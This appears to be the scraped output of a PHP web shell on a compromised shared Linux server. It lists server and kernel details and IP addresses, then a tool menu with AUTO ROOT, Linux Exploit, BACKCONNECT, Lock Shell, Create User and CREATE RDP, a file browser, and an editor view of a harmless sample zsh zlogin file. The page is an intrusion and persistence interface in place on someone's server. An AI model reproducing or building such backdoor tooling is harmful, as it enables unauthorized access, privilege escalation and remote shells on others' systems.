Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
zsh-common /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
Functions
[ DIR ]
drwxr-xr-x
Misc
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
carstenh.zshrc
14.89
KB
-rw-r--r--
reporter
10.33
KB
-rw-r--r--
ssh_completion
2.52
KB
-rw-r--r--
ssh_completion2
1.41
KB
-rw-r--r--
zlogin
581
B
-rw-r--r--
zshenv
1.53
KB
-rw-r--r--
zshrc
5.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : zlogin
# # Generic .zlogin file for zsh 2.7 # # .zlogin is sourced in login shells. It should # contain commands that should be executed only in # login shells. It should be used to set the terminal # type and run a series of external commands (fortune, # msgs, from, etc). # # THIS FILE IS NOT INTENDED TO BE USED AS /etc/zlogin, NOR WITHOUT EDITING return 0 # Remove this line after editing this file as appropriate clear stty dec new cr0 -tabs ttyctl -f # freeze the terminal modes... can't change without a ttyctl -u mesg y uptime fortune log from 2>/dev/null cat notes msgs -fp
Close